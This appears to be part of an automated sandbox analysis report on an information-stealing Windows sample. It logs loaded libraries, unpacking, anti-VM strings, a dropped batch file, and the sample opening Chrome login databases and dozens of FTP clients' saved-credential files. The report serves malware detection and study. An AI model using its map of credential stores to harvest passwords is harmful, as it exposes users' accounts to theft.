Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: msi.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: mlang.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: samlib.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Data Obfuscation

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Unpacked PE file: 1.2.BW38j8Jkbl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
Source: Yara match File source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA, 1_2_00410065
Source: BW38j8Jkbl.exe Static PE information: real checksum: 0xa2107 should be: 0xa18ac
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 0_2_00402D58 push cs; retf 0_2_00402D72

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File dump: 6000093.bat.1.dr 3880EEB1C736D853EB13B44898B718AB
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, 1_2_004051E3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_004041A6
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00404E73
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00408AE5
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00409832
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00408961
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 1_2_004045FD
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r[
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA, 1_2_00410065
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 0_2_022C0974 mov eax, dword ptr fs:[00000030h] 0_2_022C0974
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 0_2_022C02B3 mov ebx, dword ptr fs:[00000030h] 0_2_022C02B3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 0_2_022C09DD mov eax, dword ptr fs:[00000030h] 0_2_022C09DD
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0040F990 mov eax, dword ptr fs:[00000030h] 1_2_0040F990
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf, 1_2_004105D6
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,746B1B10,ImpersonateLoggedOnUser,RevertToSelf,746A5030,CloseHandle, 1_2_0041032D
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_004044D2
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 1_2_004045FD
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_0041051E OleInitialize,GetUserNameA, 1_2_0041051E
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Code function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 1_2_004045FD

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\wcx_ftp.ini
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\SharedSettings.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\Frigate3\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FTP Explorer\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\SiteDesigner\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\TurboFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\BlazeFtp\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\RhinoSoft.com\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\TurboFTP
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\CuteFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FTPInfo\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\NetSarang\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\BitKinex\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\BitKinex\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\AceBIT
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FTPInfo\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\BitKinex\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\CuteFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\SharedSettings.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\SmartFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\BlazeFtp\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\INSoftware\NovaFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FTP Explorer\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FTPGetter\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\NetSarang\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\CuteFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\CuteFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\SmartFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\TurboFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\Frigate3\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\AceBIT\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\TurboFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FTP Explorer\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\AceBIT\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FTPRush\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\BlazeFtp\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\Users\user\AppData\Local\FTPGetter\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\SharedSettings.sqlite
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\AceBIT\
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\
